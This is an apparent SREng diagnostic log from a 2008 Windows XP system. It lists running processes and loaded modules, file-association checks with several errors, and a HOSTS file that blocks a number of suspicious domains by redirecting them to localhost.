[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\SynCOM.dll] [Synaptics, Inc., 8.3.5 25May06]
[PID: 3060 / Administrator][C:\Program Files\Rising\Rav\RavTask.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.24]
[C:\Program Files\Rising\Rav\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rav\RSAPPMGR.DLL] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rav\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[PID: 3352 / Administrator][C:\Program Files\Synaptics\SynTP\SynTPEnh.exe] [Synaptics, Inc., 8.3.5 25May06]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\WINDOWS\system32\SynCOM.dll] [Synaptics, Inc., 8.3.5 25May06]
[C:\WINDOWS\system32\SynTPAPI.dll] [Synaptics, Inc., 8.3.5 25May06]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[PID: 3616 / Administrator][C:\WINDOWS\ATK0100\ATKOSD.exe] [, 1043, 2, 15, 63]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3636 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 3840 / Administrator][C:\Program Files\Wireless Console 2\wcourier.exe] [, 2, 0, 10, 0]
[C:\Program Files\Wireless Console 2\MSVCR80.dll] [Microsoft Corporation, 8.00.50727.762]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3984 / Administrator][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[PID: 4000 / Administrator][C:\Program Files\DAEMON Tools Lite\daemon.exe] [DT Soft Ltd, 4.12.2.0]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\DAEMON Tools Lite\DaemonPlugin.dll] [DT Soft Ltd, 4.12.0.0]
[C:\Program Files\DAEMON Tools Lite\daemon.dll] [DT Soft Ltd., 4.12.0.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[C:\Program Files\DAEMON Tools Lite\Lang\CHS.dll] [N/A, ]
[C:\Program Files\DAEMON Tools Lite\Lang\ENU.dll] [N/A, ]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\bw5mount.dll] [, 1.1.3.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\bwtmount.dll] [DT Soft Ltd., 1.01.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\ccdmount.dll] [DT Soft Ltd., 1.10.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\cuemount.dll] [DT Soft Ltd., 1.02.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\iszmount.dll] [DT Soft Ltd., 1.03.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\nrgmount.dll] [DT Soft Ltd., 1.12.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\pdimount.dll] [DT Soft Ltd., 1.01.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\pfcmount.dll] [DT Soft Ltd., 1.00.0.0]
[C:\Program Files\DAEMON Tools Lite\pfctoc.dll] [Padus(R), Inc., 1, 0, 0, 12]
[PID: 4020 / Administrator][C:\Program Files\Microsoft ActiveSync\wcescomm.exe] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\CEUTIL.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\RAPI.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\Program Files\Microsoft ActiveSync\TCP2UDP.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\Microsoft ActiveSync\dtptdns.dll] [Microsoft Corporation, 4.5.5096.0]
[PID: 828 / Administrator][C:\PROGRA~1\MICROS~3\rapimgr.exe] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\CEUTIL.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll] [Microsoft Corporation, 4.5.5096.0]
[PID: 164 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMng.exe] [TOSHIBA CORPORATION., 5.00.7802.ALL]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosCpsAPI.dll] [TOSHIBA CORPORATION., 3.01.5520.0]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngHelp.dll] [TOSHIBA CORPORATION., 5.00.6z01.ALL]
[C:\WINDOWS\system32\TosAvAPI.dll] [TOSHIBA CORPORATION., 5.00.6804.0]
[C:\WINDOWS\system32\TosBtSDDB.dll] [TOSHIBA CORPORATION., 5.00.7515.0]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngLang.dll] [TOSHIBA CORPORATION., 5.00.6920.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
[C:\WINDOWS\system32\TosCommAPI.dll] [N/A, ]
[C:\WINDOWS\system32\TosLaneAPI.dll] [TOSHIBA CORPORATION., 1, 0, 3, 0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\LCWizard.dll] [TOSHIBA CORPORATION, 5.0.0.ALL]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\BtUsrMod.dll] [TOSHIBA CORPORATION, 1, 01, 11, US]
[C:\WINDOWS\system32\TosHidAPI.dll] [TOSHIBA CORPORATION., 4, 0, 1108, 0]
[C:\WINDOWS\system32\TosGnsAPI.dll] [TOSHIBA CORPORATION., 5, 0, 0, 0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\TosAcpiAPI.dll] [TOSHIBA CORPORATION., 1, 0, 3, 0]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtLoad.dll] [TOSHIBA CORPORATION, 5, 10, 0, 0]
[PID: 2884 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosA2dp.exe] [TOSHIBA CORPORATION., 5.00.7227.ALL]
[C:\WINDOWS\system32\TosBtECCAPI.dll] [TOSHIBA CORPORATION., 3.00.6510.0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
[C:\WINDOWS\system32\TosAvdtAPI.dll] [TOSHIBA CORPORATION., 5.00.7410.0]
[C:\WINDOWS\system32\TosSndAPI.dll] [TOSHIBA CORPORATION., 5.00.7117.0]
[C:\WINDOWS\system32\TosSndPlug.dll] [TOSHIBA CORPORATION., 5.00.7529.ALL]
1234567i - 2008-9-2 22:10:00
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 2916 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHid.exe] [TOSHIBA CORPORATION., 4, 1, 1323, 0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3160 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHsp.exe] [TOSHIBA CORPORATION., 5.10.05.70426]
[C:\WINDOWS\system32\TosBtECCAPI.dll] [TOSHIBA CORPORATION., 3.00.6510.0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
[C:\WINDOWS\system32\LCWizard.dll] [TOSHIBA CORPORATION, 5.0.0.ALL]
[C:\WINDOWS\system32\TosSndAPI.dll] [TOSHIBA CORPORATION., 5.00.7117.0]
[C:\WINDOWS\system32\TosSndPlug.dll] [TOSHIBA CORPORATION., 5.00.7529.ALL]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 816 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\ravmond.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.80]
[C:\PROGRAM FILES\RISING\RAV\BWList.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.5]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\PROGRAM FILES\RISING\RAV\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\PROGRAM FILES\RISING\RAV\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\PROGRAM FILES\RISING\RAV\RsLog.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.36]
[C:\PROGRAM FILES\RISING\RAV\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\MonRule.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
[C:\PROGRAM FILES\RISING\RAV\Hooksys.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 12]
[C:\PROGRAM FILES\RISING\RAV\HookReg.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 6]
[C:\PROGRAM FILES\RISING\RAV\HookNtos.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 5]
[C:\PROGRAM FILES\RISING\RAV\rswalmon.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
[C:\PROGRAM FILES\RISING\RAV\recomp.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
[C:\PROGRAM FILES\RISING\RAV\refs.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
[C:\PROGRAM FILES\RISING\RAV\ffr.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 16]
[C:\Program Files\Rising\Rav\RsStore.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.9]
[C:\PROGRAM FILES\RISING\RAV\HookCont.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 3]
[C:\Program Files\Rising\Rav\fakescan.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.14]
[C:\Program Files\Rising\Rav\Scanner.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.39]
[C:\PROGRAM FILES\RISING\RAV\viruslib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
[C:\PROGRAM FILES\RISING\RAV\relibldr.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\PROGRAM FILES\RISING\RAV\HookWeb.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.3]
[C:\PROGRAM FILES\RISING\RAV\nvfile.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
[C:\PROGRAM FILES\RISING\RAV\scanexec.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 22]
[C:\PROGRAM FILES\RISING\RAV\unexe.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 6]
[C:\PROGRAM FILES\RISING\RAV\scanex.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\PROGRAM FILES\RISING\RAV\pearc.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 8]
[C:\PROGRAM FILES\RISING\RAV\scanpack.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
[C:\PROGRAM FILES\RISING\RAV\revm.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
[C:\PROGRAM FILES\RISING\RAV\urutils.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
[C:\PROGRAM FILES\RISING\RAV\ur000.dat] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\extfile.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 32]
[C:\PROGRAM FILES\RISING\RAV\scansct.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
[C:\PROGRAM FILES\RISING\RAV\extole.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 13]
[C:\PROGRAM FILES\RISING\RAV\posttrt.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
[C:\PROGRAM FILES\RISING\RAV\scriptci.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
[C:\PROGRAM FILES\RISING\RAV\ur001.dat] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
[C:\PROGRAM FILES\RISING\RAV\ur023.dat] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 3]
[C:\PROGRAM FILES\RISING\RAV\uroutine.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
[C:\PROGRAM FILES\RISING\RAV\extmail.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
[PID: 3624 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\RavStub.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.10]
[C:\PROGRAM FILES\RISING\RAV\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[PID: 496 / Administrator][C:\Program Files\Rising\Rav\RAVMON.EXE] [Beijing Rising Information Technology Co., Ltd., 20.0.01.27]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rav\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rav\recomp.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
[C:\Program Files\Rising\Rav\refs.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
[C:\Program Files\Rising\Rav\viruslib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
[C:\Program Files\Rising\Rav\relibldr.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rav\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rav\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rav\MonRule.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
[C:\Program Files\Rising\Rav\PngDll.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
[C:\Program Files\Rising\Rav\Rsguilib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\Program Files\Rising\Rav\RsXML.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[PID: 2268 / Administrator][C:\Documents and Settings\Administrator\桌面\Procexp.exe] [Sysinternals, 10.20]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[PID: 2504 / Administrator][C:\WINDOWS\system32\conime.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 2816 / Administrator][D:\Program Files\应用\同花顺核新2008\zdsj.exe] [杭州核新软件技术有限公司, 2008, 7, 1, 0]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[D:\Program Files\应用\同花顺核新2008\RICHED20.dll] [Microsoft Corporation, 5.30.23.1205]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3992 / Administrator][C:\WINDOWS\system32\notepad.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3912 / Administrator][C:\Program Files\Rising\Rfw\RfwCfg.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.2.62]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rfw\RsGuiLib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rfw\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rfw\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rfw\RfwCtrl.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\ProxyCtr.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.3]
[C:\Program Files\Rising\Rfw\RsXML.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[C:\Program Files\Rising\Rfw\PngDll.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
[C:\Program Files\Rising\Rfw\RfwRule.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[PID: 2272 / Administrator][D:\工具\网络\Maxthon2\Maxthon.exe] [Maxthon International ltd., 2, 1, 0, 1870]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[D:\工具\网络\Maxthon2\mxpp.dll] [Maxthon International ltd., 1, 0, 0, 107]
[D:\工具\网络\Maxthon2\MxSk.dll] [Maxthon, 1, 0, 0, 351]
[D:\工具\网络\Maxthon2\MxProxy2.dll] [Maxthon International ltd., 1, 0, 0, 4030]
[D:\工具\网络\Maxthon2\MxExt.dll] [N/A, ]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[D:\工具\网络\Maxthon2\mxtool.dll] [, 1, 0, 0, 1]
[D:\工具\网络\Maxthon2\maxzlib.dll] [, 1.2.3]
[D:\工具\网络\Maxthon2\mxfeedU.dll] [, 1, 0, 45, 92]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[D:\工具\网络\Maxthon2\Modules\MxWebBoost\MxWebBoost.dll] [Maxthon, 1,0,2,1187]
[D:\工具\网络\Maxthon2\mxdb.dll] [Max, 3, 5, 3, 125]
[C:\WINDOWS\system32\ieframe.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\JDWB20.IME] [五星工作室, 4.00.950]
[C:\WINDOWS\system32\GOOGLEPINYIN.IME] [Google Inc., ]
[C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx] [Adobe Systems, Inc., 9,0,124,0]
[PID: 2712 / Administrator][D:\工具\系统工具\系统诊断工具sreng2\SREngPS.EXE] [Smallfrogs Studio, 2.5.16.900]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[D:\工具\系统工具\系统诊断工具sreng2\Upload\3rdUpd.DLL] [Smallfrogs Studio, 2, 1, 0, 15]
1234567i - 2008-9-2 22:10:00
==================================
文件关联
.TXT Error. [C:\WINDOWS\notepad.exe %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM Error. ["hh.exe" %1]
.HLP OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS Error. [超级解霸3000]
.JS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]
==================================
Winsock 提供者
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS 文件
127.0.0.1 localhost
127.0.0.1 yu.8s7.net
127.0.0.1 1.jopanqc.com
127.0.0.1 2.joppnqq.com
127.0.0.1 wg.47255.com
127.0.0.1 1.joppnqq.com
127.0.0.1 xxx.m111.biz
127.0.0.1 1.jopenqc.com
127.0.0.1 1.jopenkk.com
127.0.0.1 xxx.vh7.biz
127.0.0.1 xxx.j41m.com
127.0.0.1 3.joppnqq.com
127.0.0.1 d.93se.com
127.0.0.1
www.868wg.com127.0.0.1 xxx.mmma.biz
127.0.0.1 ilove.com
127.0.0.1 tp.shpzhan.cn
127.0.0.1
www.tomwg.com127.0.0.1
www.cike007.cn127.0.0.1
www.22aaa.com127.0.0.1 xx.exiao01.com
127.0.0.1
www.exiao01.com127.0.0.1
www.exiao01.com127.0.0.1 new.749571.com
127.0.0.1 xtx.kv8.info
127.0.0.1 cao.kv8.info
127.0.0.1 1.jopmmqq.com
127.0.0.1 171817.171817.com
127.0.0.1 d2.llsging.com
